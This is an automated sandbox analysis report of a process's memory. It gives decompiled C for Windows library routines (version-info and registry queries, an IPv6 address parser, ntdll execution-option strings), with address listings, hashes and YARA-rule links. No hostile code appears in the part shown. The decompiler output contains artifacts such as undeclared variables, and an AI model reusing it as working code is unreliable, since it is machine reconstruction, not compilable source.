                                                        0x0232e327
                                                        0x0232e329
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x0232e32f
                                                        0x0232e32f
                                                        0x0232e337
                                                        0x0232e33a
                                                        0x0232e33b
                                                        0x0232e33d
                                                        0x0232e33f
                                                        0x0232e341
                                                        0x0232e341
                                                        0x0232e34e
                                                        0x0232e353
                                                        0x0232e358
                                                        0x0232e35d
                                                        0x0232e35f
                                                        0x00000000
                                                        0x00000000
                                                        0x0232e365
                                                        0x0232e365
                                                        0x0232e368
                                                        0x0232e36e
                                                        0x00000000
                                                        0x00000000
                                                        0x0232e374
                                                        0x0232e32f
                                                        0x02323f75
                                                        0x02323f7a
                                                        0x02323f7c
                                                        0x02323f7e
                                                        0x02323f86
                                                        0x02307f39
                                                        0x02307f47
                                                        0x02307f47
                                                        0x02307f37
                                                        0x02307f37
                                                        0x00000000

                                                        APIs
                                                        • BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 02323F12
                                                        Strings
                                                        • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 0232E2FB
                                                        • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 02323EC4
                                                        • Execute=1, xrefs: 02323F5E
                                                        • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 02323F75
                                                        • ExecuteOptions, xrefs: 02323F04
                                                        • CLIENT(ntdll): Processing section info %ws..., xrefs: 0232E345
                                                        • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 02323F4A
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.688194486.00000000022C0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: true
                                                        • Associated: 0000000D.00000002.688187161.00000000022B0000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000D.00000002.688305042.00000000023A0000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000D.00000002.688312609.00000000023B0000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000D.00000002.688320304.00000000023B4000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000D.00000002.688327822.00000000023B7000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000D.00000002.688335301.00000000023C0000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000D.00000002.688370384.0000000002420000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID: BaseDataModuleQuery
                                                        • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                        • API String ID: 3901378454-484625025
                                                        • Opcode ID: 0f4b7fd3a57a3ac08e6ec3191df8261c22ec90179da06c04801370640951b24d
                                                        • Instruction ID: 4ab13e233642e2f70be3640cb1c5b6b9224d7e4d97dfbc5faed9426d2cc620ba
                                                        • Opcode Fuzzy Hash: 0f4b7fd3a57a3ac08e6ec3191df8261c22ec90179da06c04801370640951b24d
                                                        • Instruction Fuzzy Hash: 6141887269031CBAEF20EA94DCD5FDAB3BDAB54704F0005A9E505E6081EB70EA458F65
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00B84931, Relevance: 13.7, APIs: 9, Instructions: 191COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ??2@YAPAXI@Z.MSVCRT ref: 00B8493D
                                                        • SafeArrayCreate.OLEAUT32(0000000C,00000001,?), ref: 00B84998
                                                        • SafeArrayCreate.OLEAUT32(0000000C,00000001,?), ref: 00B849AD
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: ArrayCreateSafe$??2@
                                                        • String ID:
                                                        • API String ID: 2937607175-0
                                                        • Opcode ID: 2ff5a1f56425503b91ac8d4dd58750494aae519bdfbdca017cb05aa96333d852
                                                        • Instruction ID: 01765b7f84ad8ed344a2e6cfa9066f07290afec4959227c907fdacc7c155d3cd
                                                        • Opcode Fuzzy Hash: 2ff5a1f56425503b91ac8d4dd58750494aae519bdfbdca017cb05aa96333d852
                                                        • Instruction Fuzzy Hash: 7751933594420ADFDB20EFA8C884ABEB7F5FF48714F244496E915EB260DB70DA41DB50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00B8442A, Relevance: 13.6, APIs: 9, Instructions: 120COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 84%
                                                        			E00B8442A(short* _a4, intOrPtr* _a8, intOrPtr* _a12) {
				signed int _v8;
				char* _v12;
				int _v16;
				void* _v20;
				int _v24;
				void* _v36;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t27;
				signed int _t32;
				int _t43;
				void* _t44;
				int _t59;
				void* _t60;
				void* _t61;
				void* _t62;
				void* _t65;
				int _t66;
				int _t67;
				signed int _t68;
				void* _t69;
				intOrPtr _t71;

				_t27 =  *0xb97004; // 0xbb40e64e
				_v8 = _t27 ^ _t68;
				 *_a8 = 0;
				 *_a12 = 0;
				_t71 =  *0xb97001; // 0x0
				if(_t71 == 0) {
					_t59 = WideCharToMultiByte(0, 0, _a4, 0xffffffff, 0, 0, 0, 0);
					if(_t59 == 0) {
						L7:
						_t32 = GetLastError();
						if(_t32 > 0) {
							_t32 = _t32 & 0x0000ffff | 0x80070000;
						}
						L6:
						_pop(_t60);
						_pop(_t65);
						return E00B81335(_t32, 0, _v8 ^ _t68, _t57, _t60, _t65);
					}
					E00B8320B(_t31);
					_v12 = _t69;
					if(_t69 != 0) {
						if(WideCharToMultiByte(0, 0, _a4, 0xffffffff, _v12, _t59, 0, 0) == 0) {
							goto L7;
						}
						_t66 = GetFileVersionInfoSizeA(_v12,  &_v16);
						if(_t66 == 0) {
							goto L7;
						}
						E00B8320B(_t38);
						_t61 = _t69;
						if(GetFileVersionInfoA(_v12, _v16, _t66, _t61) == 0) {
							goto L7;
						}
						_t43 = VerQueryValueA(_t61, E00B855B8,  &_v20,  &_v24);
						L4:
						if(_t43 == 0) {
							goto L7;
						}
						_t44 = _v20;
						_t11 = _t44 + 0x10; // 0x840f0c5d
						_t57 = _a8;
						 *_a8 =  *_t11;
						_t13 = _t44 + 0x14; // 0x5c83
						 *_a12 =  *_t13;
						_t32 = 0;
						goto L6;
					}
					_t32 = 0x8007000e;
					goto L6;
				}
				_t67 = GetFileVersionInfoSizeW(_a4,  &_v16);
				if(_t67 == 0) {
					goto L7;
				}
				E00B8320B(_t47);
				_t62 = _t69;
				if(GetFileVersionInfoW(_a4, _v16, _t67, _t62) == 0) {
					goto L7;
				}
				_t43 = VerQueryValueW(_t62, E00B844CC,  &_v20,  &_v24);
				goto L4;
			}


























                                                        0x00b84432
                                                        0x00b84439
                                                        0x00b84442
                                                        0x00b84448
                                                        0x00b8444b
                                                        0x00b84451
                                                        0x00b87ec4
                                                        0x00b87ec8
                                                        0x00b844c1
                                                        0x00b844c1
                                                        0x00b87e9c
                                                        0x00b87ea7
                                                        0x00b87ea7
                                                        0x00b844ad
                                                        0x00b844b0
                                                        0x00b844b1
                                                        0x00b844be
                                                        0x00b844be
                                                        0x00b87ece
                                                        0x00b87ed3
                                                        0x00b87ed8
                                                        0x00b87ef5
                                                        0x00000000
                                                        0x00000000
                                                        0x00b87f07
                                                        0x00b87f0b
                                                        0x00000000
                                                        0x00000000
                                                        0x00b87f11
                                                        0x00b87f16
                                                        0x00b87f27
                                                        0x00000000
                                                        0x00000000
                                                        0x00b87f3b
                                                        0x00b84494
                                                        0x00b84496
                                                        0x00000000
                                                        0x00000000
                                                        0x00b84498
                                                        0x00b8449b
                                                        0x00b8449e
                                                        0x00b844a1
                                                        0x00b844a3
                                                        0x00b844a9
                                                        0x00b844ab
                                                        0x00000000
                                                        0x00b844ab
                                                        0x00b87eda
                                                        0x00000000
                                                        0x00b87eda
                                                        0x00b84463
                                                        0x00b84467
                                                        0x00000000
                                                        0x00000000
                                                        0x00b84469
                                                        0x00b8446e
                                                        0x00b8447f
                                                        0x00000000
                                                        0x00000000
                                                        0x00b8448f
                                                        0x00000000

                                                        APIs
                                                        • GetFileVersionInfoSizeW.VERSION(00B82218,00B82238,00B82238,00B8220C,00000000,?,00B8234C,00B82238,00B82218,00B8221C), ref: 00B8445E
                                                        • GetFileVersionInfoW.VERSION(00B82218,00B82238,00000000,?,00B82218,00B82238,00B82238,00B8220C,00000000,?,00B8234C,00B82238,00B82218,00B8221C), ref: 00B84478
                                                        • VerQueryValueW.VERSION(?,00B844CC,00B8234C,?,00B82218,00B82238,00000000,?,00B82218,00B82238,00B82238,00B8220C,00000000,?,00B8234C,00B82238), ref: 00B8448F
                                                        • GetLastError.KERNEL32(?,00B8234C,00B82238,00B82218,00B8221C), ref: 00B844C1
                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00B82218,000000FF,00000000,00000000,00000000,00000000,00B82238,00B8220C,00000000,?,00B8234C,00B82238,00B82218,00B8221C), ref: 00B87EC2
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: FileInfoVersion$ByteCharErrorLastMultiQuerySizeValueWide
                                                        • String ID:
                                                        • API String ID: 3366682162-0
                                                        • Opcode ID: ca6ef5937b3099fbdbe3865a7709cb4b0a3bbccd4a06e22b66e586f1076cf17d
                                                        • Instruction ID: 4c56909052b94b4a6e9053a0014f8146b2228bcd88f13e43521dcc9cfdaed329
                                                        • Opcode Fuzzy Hash: ca6ef5937b3099fbdbe3865a7709cb4b0a3bbccd4a06e22b66e586f1076cf17d
                                                        • Instruction Fuzzy Hash: 493159B250011AAF8B11FFA4CC80EAF7BEDEF49754B1841A5F91597261DB31CE14CB60
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02310B15, Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 272COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E02310B15(intOrPtr* _a4, char _a7, intOrPtr* _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				void* _t108;
				void* _t116;
				char _t120;
				short _t121;
				void* _t128;
				intOrPtr* _t130;
				char _t132;
				short _t133;
				intOrPtr _t141;
				signed int _t156;
				signed int _t174;
				intOrPtr _t177;
				intOrPtr* _t179;
				intOrPtr _t180;
				void* _t183;

				_t179 = _a4;
				_t141 =  *_t179;
				_v16 = 0;
				_v28 = 0;
				_v8 = 0;
				_v24 = 0;
				_v12 = 0;
				_v32 = 0;
				_v20 = 0;
				if(_t141 == 0) {
					L41:
					 *_a8 = _t179;
					_t180 = _v24;
					if(_t180 != 0) {
						if(_t180 != 3) {
							goto L6;
						}
						_v8 = _v8 + 1;
					}
					_t174 = _v32;
					if(_t174 == 0) {
						if(_v8 == 7) {
							goto L43;
						}
						goto L6;
					}
					L43:
					if(_v16 != 1) {
						if(_v16 != 2) {
							goto L6;
						}
						 *((short*)(_a12 + _v20 * 2)) = 0;
						L47:
						if(_t174 != 0) {
							E022E8980(_a12 + 0x10 + (_t174 - _v8) * 2, _a12 + _t174 * 2, _v8 - _t174 + _v8 - _t174);
							_t116 = 8;
							E022DDFC0(_a12 + _t174 * 2, 0, _t116 - _v8 + _t116 - _v8);
						}
						return 0;
					}
					if(_t180 != 0) {
						if(_v12 > 3) {
							goto L6;
						}
						_t120 = E02310CFA(_v28, 0, 0xa);
						_t183 = _t183 + 0xc;
						if(_t120 > 0xff) {
							goto L6;
						}
						 *((char*)(_t180 + _v20 * 2 + _a12)) = _t120;
						goto L47;
					}
					if(_v12 > 4) {
						goto L6;
					}
					_t121 = E02310CFA(_v28, _t180, 0x10);
					_t183 = _t183 + 0xc;
					 *((short*)(_a12 + _v20 * 2)) = _t121;
					goto L47;
				} else {
					while(1) {
						_t123 = _v16;
						if(_t123 == 0) {
							goto L7;
						}
						_t108 = _t123 - 1;
						if(_t108 != 0) {
							goto L1;
						}
						_t178 = _t141;
						if(E023106BA(_t108, _t141) == 0 || _t135 == 0) {
							if(E023106BA(_t135, _t178) == 0 || E02310A5B(_t136, _t178) == 0) {
								if(_t141 != 0x3a) {
									if(_t141 == 0x2e) {
										if(_a7 != 0 || _v24 > 2 || _v8 > 6) {
											goto L41;
										} else {
											_v24 = _v24 + 1;
											L27:
											_v16 = _v16 & 0x00000000;
											L28:
											if(_v28 == 0) {
												goto L20;
											}
											_t177 = _v24;
											if(_t177 != 0) {
												if(_v12 > 3) {
													L6:
													return 0xc000000d;
												}
												_t132 = E02310CFA(_v28, 0, 0xa);
												_t183 = _t183 + 0xc;
												if(_t132 > 0xff) {
													goto L6;
												}
												 *((char*)(_t177 + _v20 * 2 + _a12 - 1)) = _t132;
												goto L20;
											}
											if(_v12 > 4) {
												goto L6;
											}
											_t133 = E02310CFA(_v28, 0, 0x10);
											_t183 = _t183 + 0xc;
											_v20 = _v20 + 1;
											 *((short*)(_a12 + _v20 * 2)) = _t133;
											goto L20;
										}
									}
									goto L41;
								}
								if(_v24 > 0 || _v8 > 6) {
									goto L41;
								} else {
									_t130 = _t179 + 1;
									if( *_t130 == _t141) {
										if(_v32 != 0) {
											goto L41;
										}
										_v32 = _v8 + 1;
										_t156 = 2;
										_v8 = _v8 + _t156;
										L34:
										_t179 = _t130;
										_v16 = _t156;
										goto L28;
									}
									_v8 = _v8 + 1;
									goto L27;
								}
							} else {
								_v12 = _v12 + 1;
								if(_v24 > 0) {
									goto L41;
								}
								_a7 = 1;
								goto L20;
							}
						} else {
							_v12 = _v12 + 1;
							L20:
							_t179 = _t179 + 1;
							_t141 =  *_t179;
							if(_t141 == 0) {
								goto L41;
							}
							continue;
						}
						L7:
						if(_t141 == 0x3a) {
							if(_v24 > 0 || _v8 > 0) {
								goto L41;
							} else {
								_t130 = _t179 + 1;
								if( *_t130 != _t141) {
									goto L41;
								}
								_v20 = _v20 + 1;
								_t156 = 2;
								_v32 = 1;
								_v8 = _t156;
								 *((short*)(_a12 + _v20 * 2)) = 0;
								goto L34;
							}
						}
						L8:
						if(_v8 > 7) {
							goto L41;
						}
						_t142 = _t141;
						if(E023106BA(_t123, _t141) == 0 || _t124 == 0) {
							if(E023106BA(_t124, _t142) == 0 || E02310A5B(_t125, _t142) == 0 || _v24 > 0) {
								goto L41;
							} else {
								_t128 = 1;
								_a7 = 1;
								_v28 = _t179;
								_v16 = 1;
								_v12 = 1;
								L39:
								if(_v16 == _t128) {
									goto L20;
								}
								goto L28;
							}
						} else {
							_a7 = 0;
							_v28 = _t179;
							_v16 = 1;
							_v12 = 1;
							goto L20;
						}
					}
				}
				L1:
				_t123 = _t108 == 1;
				if(_t108 == 1) {
					goto L8;
				}
				_t128 = 1;
				goto L39;
			}

























                                                        0x02310b21
                                                        0x02310b24
                                                        0x02310b27
                                                        0x02310b2a
                                                        0x02310b2d
                                                        0x02310b30
                                                        0x02310b33
                                                        0x02310b36
                                                        0x02310b39
                                                        0x02310b3e
                                                        0x02310c65
                                                        0x02310c68
                                                        0x02310c6a
                                                        0x02310c6f
                                                        0x0233eb42
                                                        0x00000000
                                                        0x00000000
                                                        0x0233eb48
                                                        0x0233eb48
                                                        0x02310c75
                                                        0x02310c7a
                                                        0x0233eb54
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x0233eb5a
                                                        0x02310c80
                                                        0x02310c84
                                                        0x0233eb98
                                                        0x00000000
                                                        0x00000000
                                                        0x0233eba6
                                                        0x02310cb8
                                                        0x02310cba
                                                        0x02310cd3
                                                        0x02310cda
                                                        0x02310ce4
                                                        0x02310ce9
                                                        0x00000000
                                                        0x02310cec
                                                        0x02310c8c
                                                        0x0233eb63
                                                        0x00000000
                                                        0x00000000
                                                        0x0233eb70
                                                        0x0233eb75
                                                        0x0233eb7d
                                                        0x00000000
                                                        0x00000000
                                                        0x0233eb8c
                                                        0x00000000
                                                        0x0233eb8c
                                                        0x02310c96
                                                        0x00000000
                                                        0x00000000
                                                        0x02310ca2
                                                        0x02310cac
                                                        0x02310cb4
                                                        0x00000000
                                                        0x00000000
                                                        0x02310b44
                                                        0x02310b47
                                                        0x02310b49
                                                        0x00000000
                                                        0x00000000
                                                        0x02310b4f
                                                        0x02310b50
                                                        0x00000000
                                                        0x00000000
                                                        0x02310b56
                                                        0x02310b62
                                                        0x02310b7c
                                                        0x02310bac
                                                        0x02310a0f
                                                        0x0233eaaa
                                                        0x00000000
                                                        0x0233eac4
                                                        0x0233eac4
                                                        0x02310bd0
                                                        0x02310bd0
                                                        0x02310bd4
                                                        0x02310bd9
                                                        0x00000000
                                                        0x00000000
                                                        0x02310bdb
                                                        0x02310be0
                                                        0x0233eb0e
                                                        0x02310a1a
                                                        0x00000000
                                                        0x02310a1a
                                                        0x0233eb1a
                                                        0x0233eb1f
                                                        0x0233eb27
                                                        0x00000000
                                                        0x00000000
                                                        0x0233eb36
                                                        0x00000000
                                                        0x0233eb36
                                                        0x02310bea
                                                        0x00000000
                                                        0x00000000
                                                        0x02310bf6
                                                        0x02310c00
                                                        0x02310c03
                                                        0x02310c0b
                                                        0x00000000
                                                        0x02310c0b
                                                        0x0233eaaa
                                                        0x00000000
                                                        0x02310a15
                                                        0x02310bb6
                                                        0x00000000
                                                        0x02310bc6
                                                        0x02310bc6
                                                        0x02310bcb
                                                        0x02310c15
                                                        0x00000000
                                                        0x00000000
                                                        0x02310c1d
                                                        0x02310c20
                                                        0x02310c21
                                                        0x02310c24
                                                        0x02310c24
                                                        0x02310c26
                                                        0x00000000
                                                        0x02310c26
                                                        0x02310bcd
                                                        0x00000000
                                                        0x02310bcd
                                                        0x02310b89
                                                        0x02310b89
                                                        0x02310b90
                                                        0x00000000
                                                        0x00000000
                                                        0x02310b96
                                                        0x00000000
                                                        0x02310b96
                                                        0x02310a04
                                                        0x02310a04
                                                        0x02310b9a
                                                        0x02310b9a
                                                        0x02310b9b
                                                        0x02310b9f
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x02310ba5
                                                        0x02310ac7
                                                        0x02310aca
                                                        0x0233eacf
                                                        0x00000000
                                                        0x0233eade
                                                        0x0233eade
                                                        0x0233eae3
                                                        0x00000000
                                                        0x00000000
                                                        0x0233eaf3
                                                        0x0233eaf6
                                                        0x0233eaf7
                                                        0x0233eafe
                                                        0x0233eb01
                                                        0x00000000
                                                        0x0233eb01
                                                        0x0233eacf
                                                        0x02310ad0
                                                        0x02310ad4
                                                        0x00000000
                                                        0x00000000
                                                        0x02310ada
                                                        0x02310ae6
                                                        0x02310c34
                                                        0x00000000
                                                        0x02310c47
                                                        0x02310c49
                                                        0x02310c4a
                                                        0x02310c4e
                                                        0x02310c51
                                                        0x02310c54
                                                        0x02310c57
                                                        0x02310c5a
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x02310c60
                                                        0x02310afb
                                                        0x02310afe
                                                        0x02310b02
                                                        0x02310b05
                                                        0x02310b08
                                                        0x00000000
                                                        0x02310b08
                                                        0x02310ae6
                                                        0x02310b44
                                                        0x023109f8
                                                        0x023109f8
                                                        0x023109f9
                                                        0x00000000
                                                        0x00000000
                                                        0x0233eaa0
                                                        0x00000000

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.688194486.00000000022C0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: true
                                                        • Associated: 0000000D.00000002.688187161.00000000022B0000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000D.00000002.688305042.00000000023A0000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000D.00000002.688312609.00000000023B0000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000D.00000002.688320304.00000000023B4000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000D.00000002.688327822.00000000023B7000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000D.00000002.688335301.00000000023C0000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000D.00000002.688370384.0000000002420000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID: __fassign
                                                        • String ID: .$:$:
                                                        • API String ID: 3965848254-2308638275
                                                        • Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                        • Instruction ID: bf0d8547dc4102d9d5fdcb15a7e330a9acb3ef05d404a06105837c29714b219a
                                                        • Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                        • Instruction Fuzzy Hash: 3DA17A7190420AEECF2CCF68C8557BEB7B9AF05309F24846ADC52AB281DB3496C5CF51
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00B832BE, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 158registryCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 95%
                                                        			E00B832BE(void* __edx, void* _a4, short* _a8, char* _a12) {
				signed int _v8;
				char _v1032;
				char _v3080;
				int _v3084;
				int _v3088;
				int* _v3092;
				void* _v3096;
				int _v3100;
				char* _v3104;
				void* _v3116;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t44;
				void* _t46;
				long _t50;
				int _t53;
				signed int _t57;
				int _t65;
				void* _t74;
				short* _t75;
				char* _t76;
				signed int _t77;
				int* _t78;
				intOrPtr _t80;
				long _t81;

				_t74 = __edx;
				_t44 =  *0xb97004; // 0xbb40e64e
				_v8 = _t44 ^ _t77;
				_t46 = _a4;
				_t76 = _a12;
				_t75 = _a8;
				_v3096 = _t46;
				_v3104 = _t76;
				_t80 =  *0xb97001; // 0x0
				if(_t80 == 0) {
					if(_t75 == 0) {
						_v3092 = 0;
						L20:
						_t75 = 0x400;
						_v3088 = 0x400;
						_t50 = RegQueryValueExA(_v3096, _v3092, 0,  &_v3084,  &_v1032,  &_v3088);
						if(_t50 != 0) {
							L2:
							if(_t81 > 0) {
								_t50 = _t50 & 0x0000ffff | 0x80070000;
							}
							L4:
							return E00B81335(_t50, 0, _v8 ^ _t77, _t74, _t75, _t76);
						}
						_t53 = _v3088;
						if(_t53 != 0) {
							 *((char*)(_t77 + _t53 - 0x405)) = 0;
							if(_v3084 == 1 || _v3084 == 2) {
								if(MultiByteToWideChar(0, 0,  &_v1032, 0xffffffff,  &_v3080, _t75) == 0) {
									L17:
									_t50 = GetLastError();
									goto L2;
								}
								_t57 = _v3096;
								goto L6;
							} else {
								_t57 =  &_v1032;
								L6:
								if(_v3084 <= 0) {
									L14:
									_t50 = 0x80040153;
									goto L4;
								}
								if(_v3084 > 2) {
									if(_v3084 != 4 || _v3088 != 4) {
										goto L14;
									} else {
										 *_t76 = _t57 & 0xffffff00 |  *_t57 != 0x00000000;
										L12:
										_t50 = 0;
										goto L4;
									}
								}
								 *_t76 = 1;
								if(E00B82753( &_v3080, "0", 0xffffffff) == 0 || E00B82753( &_v3080, L"no", 0xffffffff) == 0 || E00B82753( &_v3080, L"false", 0xffffffff) == 0) {
									 *_t76 = 0;
								} else {
									 *_t76 = 1;
								}
								goto L12;
							}
						}
						_t50 = 0x80004005;
						goto L4;
					}
					_t76 = WideCharToMultiByte;
					_t65 = WideCharToMultiByte(0, 0, _t75, 0xffffffff, 0, 0, 0, 0);
					_v3100 = _t65;
					if(_t65 != 0) {
						E00B8320B(_t65);
						_v3092 = _t78;
						if(WideCharToMultiByte(0, 0, _t75, 0xffffffff, _v3092, _v3100, 0, 0) == 0) {
							goto L17;
						}
						_t76 = _v3104;
						goto L20;
					}
					goto L17;
				}
				_v3088 = 0x400;
				_t50 = RegQueryValueExW(_t46, _t75, 0,  &_v3084,  &_v3080,  &_v3088);
				_t81 = _t50;
				if(_t81 == 0) {
					_t57 =  &_v3080;
					goto L6;
				}
				goto L2;
			}





























                                                        0x00b832be
                                                        0x00b832c9
                                                        0x00b832d0
                                                        0x00b832d3
                                                        0x00b832d8
                                                        0x00b832de
                                                        0x00b832e1
                                                        0x00b832e7
                                                        0x00b832ed
                                                        0x00b832f3
                                                        0x00b8984c
                                                        0x00b898f3
                                                        0x00b898a4
                                                        0x00b898c0
                                                        0x00b898cb
                                                        0x00b898d1
                                                        0x00b898d9
                                                        0x00b83329
                                                        0x00b83329
                                                        0x00b83330
                                                        0x00b83330
                                                        0x00b83335
                                                        0x00b83349
                                                        0x00b83349
                                                        0x00b898df
                                                        0x00b898e7
                                                        0x00b89902
                                                        0x00b89909
                                                        0x00b8993a
                                                        0x00b8986d
                                                        0x00b8986d
                                                        0x00000000
                                                        0x00b89873
                                                        0x00b89940
                                                        0x00000000
                                                        0x00b89914
                                                        0x00b89914
                                                        0x00b84a2e
                                                        0x00b84a34
                                                        0x00b84a99
                                                        0x00b84a99
                                                        0x00000000
                                                        0x00b84a99
                                                        0x00b84a3d
                                                        0x00b89952
                                                        0x00000000
                                                        0x00b89965
                                                        0x00b8996a
                                                        0x00b84a8e
                                                        0x00b84a8e
                                                        0x00000000
                                                        0x00b84a8e
                                                        0x00b89952
                                                        0x00b84a51
                                                        0x00b84a5b
                                                        0x00b84a95
                                                        0x00b84a8b
                                                        0x00b84a8b
                                                        0x00b84a8b
                                                        0x00000000
                                                        0x00b84a5b
                                                        0x00b89909
                                                        0x00b898e9
                                                        0x00000000
                                                        0x00b898e9
                                                        0x00b89852
                                                        0x00b89861
                                                        0x00b89863
                                                        0x00b8986b
                                                        0x00b8987a
                                                        0x00b8987f
                                                        0x00b8989c
                                                        0x00000000
                                                        0x00000000
                                                        0x00b8989e
                                                        0x00000000
                                                        0x00b8989e
                                                        0x00000000
                                                        0x00b8986b
                                                        0x00b83311
                                                        0x00b8331b
                                                        0x00b83321
                                                        0x00b83323
                                                        0x00b84a28
                                                        0x00000000
                                                        0x00b84a28
                                                        0x00000000

                                                        APIs
                                                        • RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,?,?), ref: 00B8331B
                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00020019,?,00000000), ref: 00B89861
                                                        • GetLastError.KERNEL32 ref: 00B8986D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: ByteCharErrorLastMultiQueryValueWide
                                                        • String ID: false
                                                        • API String ID: 2926610503-734881840
                                                        • Opcode ID: 7a53f0731d66d947f09ecdd4436e8ac21e94ac81ae0c69ef627b124595ebbe96
                                                        • Instruction ID: d7e915aad46ccacfa2ffbdc8f79965c7f1492444ea238631516a180d7763e895
                                                        • Opcode Fuzzy Hash: 7a53f0731d66d947f09ecdd4436e8ac21e94ac81ae0c69ef627b124595ebbe96
                                                        • Instruction Fuzzy Hash: 5A5181B190412AEEEF24AF58CD80EAA77FCEB05354F1446E9E115A61A1DF309E84CF24
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00B8413D, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 88registryCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 93%
                                                        			E00B8413D(void* __edx, void* _a4, short* _a8, char* _a12) {
				signed int _v8;
				int _v12;
				int* _v16;
				int _v20;
				void* _v32;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t23;
				signed int _t27;
				void* _t38;
				int _t39;
				void* _t40;
				signed int _t41;
				int* _t42;
				intOrPtr _t44;
				signed int _t45;

				_t38 = __edx;
				_t23 =  *0xb97004; // 0xbb40e64e
				_v8 = _t23 ^ _t41;
				_v12 = 4;
				_t44 =  *0xb97001; // 0x0
				if(_t44 == 0) {
					if(_a8 == 0) {
						_v16 = 0;
						L12:
						_t27 = RegQueryValueExA(_a4, _v16, 0,  &_v20, _a12,  &_v12);
						goto L2;
					}
					_t40 = WideCharToMultiByte;
					_t39 = WideCharToMultiByte(0, 0, _a8, 0xffffffff, 0, 0, 0, 0);
					if(_t39 != 0) {
						E00B8320B(_t30);
						_v16 = _t42;
						if(WideCharToMultiByte(0, 0, _a8, 0xffffffff, _v16, _t39, 0, 0) == 0) {
							goto L8;
						}
						goto L12;
					}
					L8:
					_t27 = GetLastError();
					goto L3;
				} else {
					_t27 = RegQueryValueExW(_a4, _a8, 0,  &_v20, _a12,  &_v12);
					L2:
					_t45 = _t27;
					if(_t45 == 0) {
						if(_v20 != 4 || _v12 != 4) {
							_t27 = 0x80040153;
						} else {
							_t27 = 0;
						}
						L5:
						return E00B81335(_t27, 0, _v8 ^ _t41, _t38, _t39, _t40);
					}
					L3:
					if(_t45 > 0) {
						_t27 = _t27 & 0x0000ffff | 0x80070000;
					}
					goto L5;
				}
			}




















                                                        0x00b8413d
                                                        0x00b84145
                                                        0x00b8414c
                                                        0x00b84154
                                                        0x00b8415b
                                                        0x00b84161
                                                        0x00b897c8
                                                        0x00b8980d
                                                        0x00b89810
                                                        0x00b89822
                                                        0x00000000
                                                        0x00b89822
                                                        0x00b897ca
                                                        0x00b897dd
                                                        0x00b897e1
                                                        0x00b897f0
                                                        0x00b897f5
                                                        0x00b89809
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00b8980b
                                                        0x00b897e3
                                                        0x00b897e3
                                                        0x00000000
                                                        0x00b84167
                                                        0x00b84179
                                                        0x00b8417f
                                                        0x00b8417f
                                                        0x00b84181
